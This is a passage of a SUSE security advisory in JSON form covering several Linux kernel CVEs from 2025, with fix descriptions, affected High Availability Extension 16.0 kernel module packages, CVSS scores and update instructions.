"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38423"
},
{
"cve": "CVE-2025-38505",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38505"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mwifiex: discard erroneous disassoc frames on STA interface\n\nWhen operating in concurrent STA/AP mode with host MLME enabled,\nthe firmware incorrectly sends disassociation frames to the STA\ninterface when clients disconnect from the AP interface.\nThis causes kernel warnings as the STA interface processes\ndisconnect events that don\u0027t apply to it:\n\n[ 1303.240540] WARNING: CPU: 0 PID: 513 at net/wireless/mlme.c:141 cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.250861] Modules linked in: 8021q garp stp mrp llc rfcomm bnep btnxpuart nls_iso8859_1 nls_cp437 onboard_us\n[ 1303.327651] CPU: 0 UID: 0 PID: 513 Comm: kworker/u9:2 Not tainted 6.16.0-rc1+ #3 PREEMPT\n[ 1303.335937] Hardware name: Toradex Verdin AM62 WB on Verdin Development Board (DT)\n[ 1303.343588] Workqueue: MWIFIEX_RX_WORK_QUEUE mwifiex_rx_work_queue [mwifiex]\n[ 1303.350856] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 1303.357904] pc : cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.364065] lr : cfg80211_process_disassoc+0x70/0xec [cfg80211]\n[ 1303.370221] sp : ffff800083053be0\n[ 1303.373590] x29: ffff800083053be0 x28: 0000000000000000 x27: 0000000000000000\n[ 1303.380855] x26: 0000000000000000 x25: 00000000ffffffff x24: ffff000002c5b8ae\n[ 1303.388120] x23: ffff000002c5b884 x22: 0000000000000001 x21: 0000000000000008\n[ 1303.395382] x20: ffff000002c5b8ae x19: ffff0000064dd408 x18: 0000000000000006\n[ 1303.402646] x17: 3a36333a61623a30 x16: 32206d6f72662063 x15: ffff800080bfe048\n[ 1303.409910] x14: ffff000003625300 x13: 0000000000000001 x12: 0000000000000000\n[ 1303.417173] x11: 0000000000000002 x10: ffff000003958600 x9 : ffff000003625300\n[ 1303.424434] x8 : ffff00003fd9ef40 x7 : ffff0000039fc280 x6 : 0000000000000002\n[ 1303.431695] x5 : ffff0000038976d4 x4 : 0000000000000000 x3 : 0000000000003186\n[ 1303.438956] x2 : 000000004836ba20 x1 : 0000000000006986 x0 : 00000000d00479de\n[ 1303.446221] Call trace:\n[ 1303.448722] cfg80211_process_disassoc+0x78/0xec [cfg80211] (P)\n[ 1303.454894] cfg80211_rx_mlme_mgmt+0x64/0xf8 [cfg80211]\n[ 1303.460362] mwifiex_process_mgmt_packet+0x1ec/0x460 [mwifiex]\n[ 1303.466380] mwifiex_process_sta_rx_packet+0x1bc/0x2a0 [mwifiex]\n[ 1303.472573] mwifiex_handle_rx_packet+0xb4/0x13c [mwifiex]\n[ 1303.478243] mwifiex_rx_work_queue+0x158/0x198 [mwifiex]\n[ 1303.483734] process_one_work+0x14c/0x28c\n[ 1303.487845] worker_thread+0x2cc/0x3d4\n[ 1303.491680] kthread+0x12c/0x208\n[ 1303.495014] ret_from_fork+0x10/0x20\n\nAdd validation in the STA receive path to verify that disassoc/deauth\nframes originate from the connected AP. Frames that fail this check\nare discarded early, preventing them from reaching the MLME layer and\ntriggering WARN_ON().\n\nThis filtering logic is similar with that used in the\nieee80211_rx_mgmt_disassoc() function in mac80211, which drops\ndisassoc frames that don\u0027t match the current BSSID\n(!ether_addr_equal(mgmt-\u003ebssid, sdata-\u003evif.cfg.ap_addr)), ensuring\nonly relevant frames are processed.\n\nTested on:\n- 8997 with FW 16.68.1.p197",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38505",
"url": "https://www.suse.com/security/cve/CVE-2025-38505"
},
{
"category": "external",
"summary": "SUSE Bug 1248185 for CVE-2025-38505",
"url": "https://bugzilla.suse.com/1248185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "low"
}
],
"title": "CVE-2025-38505"
},
{
"cve": "CVE-2025-38507",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38507"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: nintendo: avoid bluetooth suspend/resume stalls\n\nEnsure we don\u0027t stall or panic the kernel when using bluetooth-connected\ncontrollers. This was reported as an issue on android devices using\nkernel 6.6 due to the resume hook which had been added for usb joycons.\n\nFirst, set a new state value to JOYCON_CTLR_STATE_SUSPENDED in a\nnewly-added nintendo_hid_suspend. This makes sure we will not stall out\nthe kernel waiting for input reports during led classdev suspend. The\nstalls could happen if connectivity is unreliable or lost to the\ncontroller prior to suspend.\n\nSecond, since we lose connectivity during suspend, do not try\njoycon_init() for bluetooth controllers in the nintendo_hid_resume path.\n\nTested via multiple suspend/resume flows when using the controller both\nin USB and bluetooth modes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38507",
"url": "https://www.suse.com/security/cve/CVE-2025-38507"
},
{
"category": "external",
"summary": "SUSE Bug 1248188 for CVE-2025-38507",
"url": "https://bugzilla.suse.com/1248188"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38507"
},
{
"cve": "CVE-2025-38510",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38510"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkasan: remove kasan_find_vm_area() to prevent possible deadlock\n\nfind_vm_area() couldn\u0027t be called in atomic_context. If find_vm_area() is\ncalled to reports vm area information, kasan can trigger deadlock like:\n\nCPU0 CPU1\nvmalloc();\n alloc_vmap_area();\n spin_lock(\u0026vn-\u003ebusy.lock)\n spin_lock_bh(\u0026some_lock);\n \u003cinterrupt occurs\u003e\n \u003cin softirq\u003e\n spin_lock(\u0026some_lock);\n \u003caccess invalid address\u003e\n kasan_report();\n print_report();\n print_address_description();\n kasan_find_vm_area();\n find_vm_area();\n spin_lock(\u0026vn-\u003ebusy.lock) // deadlock!\n\nTo prevent possible deadlock while kasan reports, remove kasan_find_vm_area().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38510",
"url": "https://www.suse.com/security/cve/CVE-2025-38510"
},
{
"category": "external",
"summary": "SUSE Bug 1248166 for CVE-2025-38510",
"url": "https://bugzilla.suse.com/1248166"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38510"
},
{
"cve": "CVE-2025-38511",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38511"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/pf: Clear all LMTT pages on alloc\n\nOur LMEM buffer objects are not cleared by default on alloc\nand during VF provisioning we only setup LMTT PTEs for the\nactually provisioned LMEM range. But beyond that valid range\nwe might leave some stale data that could either point to some\nother VFs allocations or even to the PF pages.\n\nExplicitly clear all new LMTT page to avoid the risk that a\nmalicious VF would try to exploit that gap.\n\nWhile around add asserts to catch any undesired PTE overwrites\nand low-level debug traces to track LMTT PT life-cycle.\n\n(cherry picked from commit 3fae6918a3e27cce20ded2551f863fb05d4bef8d)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38511",
"url": "https://www.suse.com/security/cve/CVE-2025-38511"
},
{
"category": "external",
"summary": "SUSE Bug 1248175 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "external",
"summary": "SUSE Bug 1248176 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248176"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-38511"
},
{
"cve": "CVE-2025-38512",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38512"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: prevent A-MSDU attacks in mesh networks\n\nThis patch is a mitigation to prevent the A-MSDU spoofing vulnerability\nfor mesh networks. The initial update to the IEEE 802.11 standard, in\nresponse to the FragAttacks, missed this case (CVE-2025-27558). It can\nbe considered a variant of CVE-2020-24588 but for mesh networks.\n\nThis patch tries to detect if a standard MSDU was turned into an A-MSDU\nby an adversary. This is done by parsing a received A-MSDU as a standard\nMSDU, calculating the length of the Mesh Control header, and seeing if\nthe 6 bytes after this header equal the start of an rfc1042 header. If\nequal, this is a strong indication of an ongoing attack attempt.\n\nThis defense was tested with mac80211_hwsim against a mesh network that\nuses an empty Mesh Address Extension field, i.e., when four addresses\nare used, and when using a 12-byte Mesh Address Extension field, i.e.,\nwhen six addresses are used. Functionality of normal MSDUs and A-MSDUs\nwas also tested, and confirmed working, when using both an empty and\n12-byte Mesh Address Extension field.\n\nIt was also tested with mac80211_hwsim that A-MSDU attacks in non-mesh\nnetworks keep being detected and prevented.\n\nNote that the vulnerability being patched, and the defense being\nimplemented, was also discussed in the following paper and in the\nfollowing IEEE 802.11 presentation:\n\nhttps://papers.mathyvanhoef.com/wisec2025.pdf\nhttps://mentor.ieee.org/802.11/dcn/25/11-25-0949-00-000m-a-msdu-mesh-spoof-protection.docx",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38512",
"url": "https://www.suse.com/security/cve/CVE-2025-38512"
},
{
"category": "external",
"summary": "SUSE Bug 1248178 for CVE-2025-38512",
"url": "https://bugzilla.suse.com/1248178"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38512"
},
{
"cve": "CVE-2025-38513",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38513"
}
],
"notes": [
{
"category": "general",
